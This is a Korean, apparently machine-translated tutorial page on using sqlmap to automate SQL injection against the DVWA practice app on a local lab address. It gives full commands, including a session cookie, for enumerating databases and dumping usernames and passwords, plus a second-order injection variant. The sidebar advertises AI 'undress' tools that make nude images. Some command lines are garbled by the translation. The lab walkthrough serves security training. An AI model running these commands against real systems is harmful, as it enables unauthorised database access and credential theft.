지역 사회
배우다
도구 라이브러리
AI 도구
여가
찾다
한국어
운영 및 유지보수 안전 Sqlmap 자동 주입의 샘플 분석

Sqlmap 자동 주입의 샘플 분석

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
May 13, 2023 pm 03:31 PM
sqlmap

sqlmap을 사용하여 dvwa에 대한 주입 자동화
dvwa 수준을 낮음으로 설정

  1. dvwa의 SQL 주입(SQL 주입(Blind)) 열기, 브라우저 디버깅 열기, 사용자 ID 입력 및 제출, 차단된 요청 보기.

  2. GET 요청임을 알 수 있습니다. URL은 "http://192.168.1.222:8089/dvwa/vulneraries/sqli/?id=1&Submit=Submit#"

  3. 넣었습니다. salmap 테스트에 직접 들어가십시오. 잠시 동안 -u 명령을 사용하십시오. -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#"

  4. 필요한 것을 볼 수 있습니다. 여기에 로그인하지 않으면 부족할 수 없습니다. 따라서 로그인을 유지하려면 쿠키를 추가해야 합니다

6. Burp Suite 프록시를 사용하여 패킷을 캡처하고, 로그인 쿠키를 얻고, --dbs 버스트 데이터 -u "http://192.168.1.222:8089/vulnerability/를 추가합니다. sqli/ ?id=1&Submit=Submit#" -- cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" --dbs

폭발한 데이터베이스가 mysql

임을 알 수 있습니다. 7. -D xxx를 사용하여 데이터베이스를 보려면 --tables를 사용합니다. 이 데이터베이스의 모든 테이블을 봅니다. -u "http://192.168.1.222:8089/vulnerability/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security =low" -D dvwa --tables

실행 결과 보기:

8. -D xxx -T ttt를 사용하여 보려는 테이블을 지정하고 --columns를 사용하여 테이블의 열을 봅니다

- u "http://192.168.1.222: 8089/vulnerability/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T 사용자 --columns

9. -D xxx를 사용하여 데이터베이스를 보고, -T xxx는 볼 테이블을 지정하고, -C xxx를 사용하여 테이블의 열을 보고, -dump를 사용하여 열 데이터를 봅니다

-u "http://192.168 .1.222:8089/vulnerability/sqli/?id=1&Submit=Submit#" - -cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T 사용자 -C 비밀번호,user --dump

  • 조정 dvwa 보안 수준을 중간으로 설정하고 캡처된 데이터 패킷을 .txt 파일로 저장합니다. sqlmap 디렉터리에 직접 -r 파일 이름 --dbs(이후 매개변수를 직접 추가할 수 있습니다)


  • dvwa 보안 수준을 높음으로 조정하세요. 이번에 제출한 페이지는 결과를 반환하는 페이지와 동일하지 않기 때문에 여기서는 이전 방법을 사용할 수 없습니다. 2차 주입 방식을 사용하려면

  • 데이터 제출 URL​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​ 캡처된 데이터 패킷을 .txt 파일로 저장하고 sqlmap 디렉터리로 이동하여 데이터베이스를 폭발시킵니다. 명령:
    -r 1.txt --second-url

    • "http://192.168.1.222:8089/vulnerability/sqli/" -- 배치 --레벨 2

  • --dbs

                                                              qli/" - -batch - -레벨 2 -D dvwa --tables

                                                               /vulnerability/sqli /" ​ -- 배치 --level 2 -D dvwa -T user --columns

​ 폭발된 필드 데이터

-r 1.tx t --second-url " http://192.168.1.222:8089/vulnerability/sqli/" -- 배치 --level 2 -D dvwa - T users -C user,password --dump

몇 가지 개념적 질문:

2차 주입: 2차

sql 주입--때로는 2차. 주입 지점에 입력된 데이터가 반환되면 결과는 현재 페이지가 아니라 다른 페이지입니다. 이때 응답을 받을 페이지를 지정하여 true인지 false인지 확인해야 합니다. –second-url 다음에 반환된 페이지의 URL 주소

--batch: 자동 기본 구성, 수동으로 yes 또는 no를 누를 필요가 없습니다

  • level:Sqlmap에는 총 5개의 감지 수준이 있으며 기본값은 1입니다. 수준이 높을수록 탐지 중에 더 많은 페이로드가 사용됩니다. 그 중 레벨 5의 페이로드가 가장 많으며 쿠키, XFF 등의 헤더를 자동으로 크랙하여 주입합니다. 물론 레벨이 높을수록 감지 시간은 느려집니다. 이 매개변수는 테스트의 주입 지점에 영향을 미칩니다. GET 및 POST 데이터는 레벨이 2일 때 테스트됩니다. HTTP User-Agent/Referer 헤더는 레벨이 3일 때 테스트됩니다. 어떤 매개변수가 주입 지점인지 확실하지 않은 경우 정확도를 보장하기 위해 레벨을 5로 설정하는 것이 좋습니다(속도도 느려집니다)

    • 위 내용은 Sqlmap 자동 주입의 샘플 분석의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

    본 웹사이트의 성명
    본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

    핫 AI 도구

    Undresser.AI Undress

    Undresser.AI Undress

    사실적인 누드 사진을 만들기 위한 AI 기반 앱

    AI Clothes Remover

    AI Clothes Remover

    사진에서 옷을 제거하는 온라인 AI 도구입니다.

    Undress AI Tool

    Undress AI Tool

    무료로 이미지를 벗다

    Clothoff.io

    Clothoff.io

    AI 옷 제거제

    AI Hentai Generator

    AI Hentai Generator

    AI Hentai를 무료로 생성하십시오.

    더보기

    인기 기사

    R.E.P.O. 에너지 결정과 그들이하는 일 (노란색 크리스탈)
    4 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
    R.E.P.O. 최고의 그래픽 설정
    4 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
    어 ass 신 크리드 그림자 : 조개 수수께끼 솔루션
    2 몇 주 전 By DDD
    R.E.P.O. 아무도들을 수없는 경우 오디오를 수정하는 방법
    4 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
    R.E.P.O. 채팅 명령 및 사용 방법
    4 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
    더보기

    뜨거운 도구

    메모장++7.3.1

    메모장++7.3.1

    사용하기 쉬운 무료 코드 편집기

    SublimeText3 중국어 버전

    SublimeText3 중국어 버전

    중국어 버전, 사용하기 매우 쉽습니다.

    스튜디오 13.0.1 보내기

    스튜디오 13.0.1 보내기

    강력한 PHP 통합 개발 환경

    드림위버 CS6

    드림위버 CS6

    시각적 웹 개발 도구

    SublimeText3 Mac 버전

    SublimeText3 Mac 버전

    신 수준의 코드 편집 소프트웨어(SublimeText3)

    더보기

    뜨거운 주제

    Gmail 이메일의 로그인 입구는 어디에 있나요?
    7526
    15
    Cakephp 튜토리얼
    1378
    52
    Steam의 계정 이름 형식은 무엇입니까?
    81
    11
    Win11 활성화 키 영구
    54
    19
    NYT 연결 힌트와 답변
    21
    74
    더보기
    Related knowledge
    Sqlmap 자동 주입의 샘플 분석 Sqlmap 자동 주입의 샘플 분석 May 13, 2023 pm 03:31 PM

    sqlmap을 사용하여 dvwa에 대한 주입을 자동화하고, dvwa 수준을 낮게 설정하고, dvwa의 SQLInjection(SQLInjection(Blind))을 열고, 브라우저 디버깅을 열고, 사용자 ID를 입력하고 제출하고, 가로채는 요청을 봅니다. GET 요청임을 알 수 있습니다. URL은 "http://192.168.1.222:8089/dvwa/vulnerability/sqli/?id=1&Submit=Submit#"입니다. 테스트를 위해 salmap에 직접 넣고 다음을 사용합니다. u 명령 -u"http://192.168.1.22

    sqlmap에 대한 문제를 분석하는 방법 sqlmap에 대한 문제를 분석하는 방법 May 27, 2023 pm 01:07 PM

    0x00 개요 최근 sqlmap 인젝션 테스트를 하다가 이상한 현상이 발생했습니다. sqlmap 상위 버전에서는 인젝션을 감지할 수 있는데, 하위 버전에서는 인젝션을 감지할 수 있고, 이후에는 오탐이 아닌 데이터가 실행될 수 있습니다. sqlmap 소스코드를 비교 테스트하고 살펴보니 작은 구멍 두 개가 발견되었습니다. 0x01 시나리오 재현 주입 지점 형식: json..."whereparams":[{"name":"keyWord","value":"test"}]} 주입 가능한 매개 변수: valuesqlmap 명령: pythonsqlmap.py-rsqlpk.txt– 플러시 -session-vvsqlmapv1.2.11은 s를 주입할 수 없습니다.

    SQLMap 및 SQLi 주입 방어 분석 방법 SQLMap 및 SQLi 주입 방어 분석 방법 May 11, 2023 pm 06:37 PM

    1부: Sqlmap 사용 1.1 sqlmap 소개 1. sql 주입에 대한 몇 가지 기본 설명을 언급했지만 수동 주입은 매우 번거로운 작업입니다. 강력한 sql 주입 도구인 sqlmap을 사용하여 데이터를 얻을 수 있습니다. 2. sqlmap 소개 (1) # sqlmap은 데이터베이스에 연결된 서버와 SQL 인젝션 취약점을 자동으로 탐지하고 악용할 수 있는 오픈소스 침투 테스트 도구입니다. 매우 강력한 탐지 엔진, 다양한 기능을 갖춘 침투 테스터, 데이터베이스 지문 인식 및 대역 외 연결을 통한 명령 실행을 통한 기본 파일 시스템에 대한 액세스 기능을 갖추고 있습니다. 공식 웹사이트: sqlmap.org(2)#지원되는 데이터베이스: MySQL, Oracle, PostgreS

    SQLMAP의 양파 모드 프록시는 무엇입니까? SQLMAP의 양파 모드 프록시는 무엇입니까? May 26, 2023 am 09:56 AM

    외부 웹사이트에 대한 침투 테스트가 필요하기 때문에 대부분의 웹사이트는 접속 빈도를 통제하고 있으며, 이 빈도를 초과하면 해당 IP는 바로 차단됩니다. 특히 SQLMAP이 실행 중인 경우에는 더욱 "아줌마 레드"가 되며 SQLMAP 실행이 완료되기 전에 오류가 보고되고 종료됩니다. 그래서 SQLMAP의 프록시 모드에 대해 연구하기 시작했습니다. SQLMAP에는 두 가지 프록시 모드가 있습니다. 하나는 일반 프록시(HTTP 프록시)이고 다른 하나는 어니언 프록시입니다. 원래는 일반 에이전트의 적용에 대해 쓰고 싶었지만 Baidu는 이 기사가 충분히 상세하다는 것을 보고 말도 안되는 이야기를 중단했습니다. Sqlmap 확장 - 외부 IP 프록시 풀 구현 어니언 프록시를 중심으로 살펴보겠습니다. 처음에는 어니언을 직접 인젝션할 때 "이모 레드" 리포트가 없었지만, 이후에는 침투하는 웹사이트가 많아졌습니다.

    sqlmap 시간 기반 주입 분석을 구현하는 방법 sqlmap 시간 기반 주입 분석을 구현하는 방법 May 12, 2023 pm 12:10 PM

    1. 서문 SQL 인젝션을 탐지하는 방법은 무엇입니까? 내 대답은 다음과 같습니다. 당사자 A가 보안을 수행할 때 SQL 주입 감지는 상대적으로 쉽습니다. 1) 오류 주입 감지. 2) 오탐률이 상대적으로 높으므로 부울 오류 보고서를 삽입하지 마세요. 3) 시간 기반의 시간 주입, 접점 운영 및 유지 관리를 수행하여 느린 로그 DB 기록, 모니터 수면 및 벤치마크 키워드 모니터링을 수행합니다. 스캔 작업의 ID 번호를 수면 시간의 소수점 자리에 추가하여 위치 지정을 용이하게 할 수 있습니다. (p.s. 이 방법으로 SQL 주입을 99% 찾아낼 수 있습니다.) 그래서 시간 기반의 시간 주입을 할 때 시간 오류를 매우 가혹하게 제한합니다. 하지만 @chengable은 t를 기반으로 Party B에서 보안 관련 작업을 수행하고 있습니다.

    sqlmap _dns 주입 구성 방법은 무엇입니까? sqlmap _dns 주입 구성 방법은 무엇입니까? May 12, 2023 pm 12:25 PM

    인터넷에는 sqlmap에 대한 DNS 주입 관련 기사가 너무 적습니다. 그들은 --dns-domain 매개변수를 간략하게 소개합니다. 관련 실제 기사가 모호하거나 한 획으로 언급되어 혼란스럽습니다(주로 부정직합니다. 핵심은 다음과 같습니다). 아직 빅 보스는 아닙니다). 그러다가 인터넷에 있는 방법들을 참고해서 다시 해봤습니다. 준비해야 할 것은 sqlmap 1개, 윈도우 블라인드 인젝션, 도메인네임 2개, 외부 네트워크 서버 1개이다. 한번은 뭔가를 하다가 타임블라인드 인젝션을 우연히 발견했는데, 마침 윈도우즈 머신이었는데, DNS 인젝션 방법이 생각나더군요. 시작하기 전에 sqlmap의 --sql-shell 명령을 사용하여 dns 주입 페이로드를 테스트할 계획입니다. 먼저 burpsuite로 이동합니다.

    sqlmap 처리 서명 암호화 아이디어 sqlmap 처리 서명 암호화 아이디어 May 14, 2023 am 11:52 AM

    회사 APP를 테스트해보니 모든 매개변수 내용에 32비트 문자를 추가하고 최종적으로 MD5 암호화를 수행한 것으로 나타났습니다. APP 처리 과정에서는 먼저 서명이 맞는지 검증하기 때문에 서명 검증에 실패하면 아예 데이터베이스에 들어갈 수 없게 되므로 이를 테스트하기 위해 프록시 데이터에 대한 스크립트를 작성했습니다. 데이터 패킷의 매개변수 내용과 32자를 암호화하여 교체합니다. 참고: 이 스크립트는 암호화 프로세스를 알 수 있거나 프런트 엔드 JS의 암호화 방법을 얻을 수 있으므로 회사 내부 시스템에 적합합니다. 먼저 Django를 사용하여 회사 시스템을 시뮬레이션하는 프로그램을 작성했습니다. 프로세스는 POST ID와 토큰을 얻고 사용자 정의 암호화 단어를 추가하는 것이었습니다.

    sqlmapGetshell을 사용하는 방법 sqlmapGetshell을 사용하는 방법 May 13, 2023 pm 06:25 PM

    sqlmap은 파일을 읽고 씁니다. –file-read: 백엔드 데이터베이스 관리 시스템 파일 시스템에서 파일을 읽습니다. –file-write: 백엔드 데이터베이스 관리 시스템 파일 시스템의 로컬 파일을 편집합니다(로컬에서 쓰기) –file-dest: 백엔드 데이터베이스 관리 시스템이 작성한 파일의 절대 경로(쓰기 대상 경로) SQL 인젝션 후 위의 명령을 사용하여 시스템 파일을 읽고 쓸 수 있지만 전제 조건은 읽기 및 쓰기가 필요하다는 것입니다. 권한이 있고 dba 권한이어야 합니다. 그렇지 않으면 읽기 및 쓰기 작업을 성공적으로 수행할 수 없습니다. DVWA를 예로 들면, kali에서 DVWA를 빌드하여 파일을 읽고 쓰세요. 파일 읽기: PHPinfo에서 관련 정보를 확인하고 -file-r을 사용하세요.

    See all articles